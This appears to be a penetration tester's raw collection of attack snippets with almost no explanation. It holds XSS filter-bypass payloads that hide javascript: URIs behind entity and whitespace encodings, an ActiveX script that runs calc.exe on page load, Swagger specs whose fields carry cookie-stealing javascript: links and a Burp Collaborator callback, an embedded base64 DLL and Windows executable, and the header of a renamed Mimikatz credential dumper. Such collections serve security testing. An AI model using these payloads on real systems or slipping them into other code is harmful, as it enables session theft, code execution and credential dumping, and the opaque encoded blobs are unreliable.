xsuperbug

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

xsuperbug

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

xsuperbug

<script language="javascript" type="text/javascript">
function OpenFile(){
alert ('Work');
var x = new ActiveXObject("WScript.Shell");
x.run('calc.exe');
}
</script>
</head>
<body onload="OpenFile()">

xsuperbug

# Load Rebex ECC DLL for net20
# Source: http://labs.rebex.net/curves
$EncodedCompressedFile = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/j8uKnf28D9z/6NX6t3/U3/DV/g1/j1/iT6P+/nny2/Bvp95R++YfoJ7DD77+W4I3H/Pw1fo0f48/x/Nq/xu/5h/8av8Zvxv9zP+0Pfn47gvsavxDcrV/bfOo9/9Fv8Gv8RvTjr/obfoNf43eKfD34pL/Gr/EbeH/+BvT3t72/x23+rqWf7Z/4G8hYMFbF2zz08R8wrpt6Sr8zbhg7Bvqn/AZBu9+T/jeu87KihsAVODOsP6PX7knwAT0vQddfQ3D7tX6NX/fX+Kf+tl/n1/iPftWv/Wv8mt2Gt3we/Vpbv9mv8Wskv9av/UsIwq/zrV/wa/1i/vlr/JY7v9av8VvR9/TXb/5rr2kwv1by623/Wr/Nt36tX2+LRvTrfetIGv7a/O//9Wt+67fc+TV/jd/01+Bh/ObyVfJb/BpbvzmB/tZ/8Gv9Olv0wa/3a2//hjX9XDW/BX36g1+X/vqt7V+/1q+9RW//er+EOvp1fq1f95f8OozDr004nCiegzA+GYCBYf16DIjg/bo6tl9bf/46+pM/57H+Dr8G+I/G+mvd+7V+22/92uvf4td0I65+SwzjUl77tflf/mj0G1CXTI3f5lsv5NvqtwIxtwjur5d964+RDka/sfz8tZs/9teltgqm+W

xsuperbug

swagger: "2.0",
info: 
  title: "Swagger Sample App",
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"

xsuperbug

swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <img src="https://828fh2yinnngr821bgxe95574yapye.burpcollaborator.net">
paths:
  /:
    get:
      responses:
        200:

xsuperbug

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALVJqloAAAAAAAAAAOAAIgALATAAAA4AAAAIAAAAAAAAiiwAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADgsAABPAAAAAEAAAPQFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkAwAAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPQFAAAAQAAAAAYAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABsLAAAAAAAAEgAAAACAAUAcCEAAMgKAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwADAQAAAQAAESgPAAAKcgEAAHAoEAAACm8RAAAKKA8AAApyAQAAcCgQAAAKbxIAAAoCLFwCjixYAigBAAArEgAoFAAACixJBhYvFXINAABwKBUAAAoGKBYAAAo4gAAAAHKBAABwBmwoFwAACgsSASgYAAAKjBkAAAFy4QAAcCgZAAAKKBUAAAoGKBYAAAorUHL5AABwKBUAAAooGgAACigVAAAKcm8BAHAoFQAA

xsuperbug

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>JS Bin</title>
</head>
<body>
<object/onerror=write`1`//
     

xsuperbug

function Invoke-Mimidogz
{


[CmdletBinding(DefaultParameterSetName="DumpCred")]
Param(
	[Parameter(Position = 0)]
	[String[]]
	$ComputerName,

xsuperbug

###
If you use kali or any distro over SSH (like Droplet or VM with no GUI), You might have noticed aquatone does require xorg. 
This few lines will help you create a report of domains with response headers and screenshots using gowitness.

Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone

> Setup Kali Linux Hyper-V  OR Ubuntu droplet
> Set VM/Droplet to Apache on boot. (Also SSH if it's VM) 
> Set VM to start on host boot